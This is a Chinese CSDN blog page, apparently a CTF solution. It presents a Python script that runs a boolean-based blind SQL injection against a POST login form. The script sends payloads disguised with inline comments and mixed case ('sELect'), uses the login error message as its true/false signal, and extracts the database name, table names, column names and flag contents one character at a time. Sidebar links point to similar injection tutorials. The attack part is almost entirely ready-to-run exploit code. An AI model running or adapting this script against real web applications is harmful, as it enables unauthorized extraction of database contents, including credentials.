sql盲注脚本

最新推荐文章于 2024-04-07 21:19:30 发布
最新推荐文章于 2024-04-07 21:19:30 发布
阅读量210 收藏 3
点赞数
分类专栏: web sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/since_2020/article/details/119703921
版权
web 同时被 2 个专栏收录
13 篇文章 0 订阅
订阅专栏
sql
3 篇文章 0 订阅
订阅专栏
本文介绍了一段利用POST方法进行的盲注脚本,通过发送精心构造的payload,探测数据库名、表名、字段名和数据内容,以检查是否存在SQL错误。作者使用requests库实现并演示了如何逐个尝试不同字符进行注入。
摘要由CSDN通过智能技术生成

盲注脚本

POST型
from time import sleep

import requests

s = requests.Session()
url = '******'
flag = ''

class Solution:

    # 数据库名
    def function_database(self,left_num, compare_str_num):
        payload = f"/**/or/**/ord(right(left((database()),{left_num}),1))={compare_str_num}#"
        
        data = {
            "name": '-1\'' + payload,
            "pass": "1"
        }
        r = s.post(url, data=data)

        if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            return True
        else:
            return False

    # 表名
    def function_table(self,left_num, compare_str_num):
        payload = f"/**/or/**/ord(right(left((sELect/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{left_num}),1))={compare_str_num}#"
        
        data = {
            "name": '-1\'' + payload,
            "pass": "1"
        }
        r = s.post(url, data=data)

        if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            return True
        else:
            return False

    # 字段名
    def function_column(self, left_num, compare_str_num):
        payload = f"/**/or/**/ord(right(left((sELect/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='fl4g'),{left_num}),1))={compare_str_num}#"
        
        data = {
            "name": '-1\'' + payload,
            "pass": "1"
        }
        r = s.post(url, data=data)

        if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            return True
        else:
            return False

    # 数据内容
    def function_content(self, left_num, compare_str_num):
        payload = f"/**/or/**/ord(right(left((sELect/**/flag/**/from/**/fl4g),{left_num}),1))={compare_str_num}#"
        
        data = {
            "name": '-1\'' + payload,
            "pass": "1"
        }
        r = s.post(url, data=data)

        if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            return True
        else:
            return False


solve = Solution()

for left_num in range(1, 100):
    low = 32#32
    high = 127#127
    for compare_str_num in range(low, high):
        sleep(0.1)
        if solve.function_content(left_num, compare_str_num):
            flag += chr(compare_str_num)
            print(flag)

            break

print(flag)
white_&_black
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql盲注
weixin_48734687的博客
10-10 182
sql盲注 目录 什么是盲注 盲注原理 盲注分类 如何盲注 什么是盲注 当我们进行sql注入时,若向服务器发送的请求正确时,服务器会正常返回正确的数据;如果我们的请求是错误的,服务器不会返回任何信息。 盲注原理 盲注是我们向服务器发送一个逻辑判断请求,通过对返回值的真或假来分析数据库的结构和获取数据库的数据。 盲注分类 基于布尔的盲注 基于时间的盲注 如何盲注 以获取当前数据库名来介绍盲注步骤,获取其他数据与当前类似。 靶场:sqli-lab/less-8 1.在正确的参数后面加上’ 、"
SQL盲注
CDLittleBoy的博客
05-15 1187
说明 学习思路,源自《白帽子讲Web安全》,lcamry《MySQL注入天书》 1、盲注 注入漏洞不显示来自数据库的报错信息,报错信息中只包含通用的错误提示,此时SQL注入将不能通过报错信息直观获取注入语句的执行结果,既是盲注(Blind Injection)。盲注时不能直观获取结果,但可以通过基于逻辑真假的不同页面表现,来进行结果的判断,从而达到数据获取的目的。 盲注的大致分类有三种 1、基于布尔的SQL盲注 2、基于时间的SQL盲注 3、基于报错的SQL盲注 2、基于布尔的MySQL盲注 基本思路是对获
SQL注入之盲注(小白的学习)
lgsyydsa的博客
06-04 585
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
Python自动化sql注入:布尔盲注
qq_46145027的博客
04-22 3619
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
Kali渗透测试之DVWA系列(四)——使用Burp Suite进行SQL Injection(Blind)(SQL盲注,包括盲注脚本
weixin_45116657的博客
08-25 4613
目录: 一、SQL盲注 SQL盲注SQL注入的区别; SQL盲注的过程; 二、实验环境 三、实验过程 基于布尔值的盲注; 基于时间的盲注; 一、SQL盲注简介 1、SQL盲注盲注SQL Injection(Blind),即SQL盲注,目标只会回复是或不是,没有详细内容; 注入:可以查看详细的内容 2、手工盲注思路: 手工盲注的过程,就像你和机器人聊天一样,这个机器人知道的...
SQL盲注及python脚本编写
nobugnomoney的博客
05-18 3518
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1415
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
CTF用的各种脚本,各类古典加解密的脚本,RSA常用脚本SQL盲注脚本,编码加解密神器
12-29
- `web`:包含有关Web安全的脚本,如SQL盲注工具和HTTP请求构造器。 - `tools`:一些通用的安全工具,比如编码解码实用程序,可能还有其他辅助分析的脚本。 - `notes`:可能包含对各种技术的笔记和教程,帮助理解...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sql盲注检测的简单脚本.zip
03-10
这个"sql盲注检测的简单脚本.zip"压缩包很可能包含了用于检测这种安全问题的脚本工具。 SQL盲注的基本原理是利用Web应用对用户输入数据的不当处理。如果一个应用直接将用户输入的参数拼接到SQL查询中,而没有进行...
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
sql盲注python脚本
weixin_48266255的博客
08-29 462
【代码】sql盲注python脚本
SQL注入布尔盲注
qq_45557130的博客
10-04 766
sql注入布尔盲注
SQL注入入门进阶_报错注入、延时注入、python脚本盲注
菜鸟学安全的博客
01-17 771
本篇文章入门SQL注入,除了回显的SQL注入还存在报错注入、布尔盲注和延时注入。如果sqlmap跑不出来的还可以使用burp intrude注入或者使用python编写脚本注入。
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 1047
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 746
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
SQL盲注(布尔盲注
最新发布
Dug123456_的博客
04-07 1259
flag有固定的格式,以右花括号结束,假设flag有小写英文字母、下划线、花括号构成,由于不知道flag长度,要一个无限循环,定义计数符j,内嵌循环i遍历小写、下划线和花括号,匹配到字符后j++,出循环的条件是当前i是右花括号,即flag结束。再大循环i次(遍历所有表),内嵌循环j次(表名的所有字符),i是表下标-1,j是字符下标,再内嵌循环k从a到z(假设表名全是小写英文字符)尝试获取每个表的表名。1 and length(database())=4 //判断数据库名字的长度是否为4。
flask session伪造admin身份
since_2020的博客
08-09 4154
flask session 伪造 准备工作 需要先找是否有SECRET_KEY python脚本可以把flask的session解密出来,但是如果想要加密伪造生成自己的session的话,还需要知道flask用来签名的SECRET_KEY 假设当前的SECRET_KEY是 ckj123 安装缺少的module 注意: 第一次弄的时候没有很多module,会报这样类似的错 ImportError: No module named ‘itsdangerous’ 直接安装对应module pip ins
用python写一个sql盲注脚本
05-01
以下是一个基本的 Python SQL 盲注脚本,它可以用于测试 SQL 注入攻击: ```python import requests # 目标URL url = "http://example.com/login.php" # 注入参数 injection_param = "username" # 注入语句 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值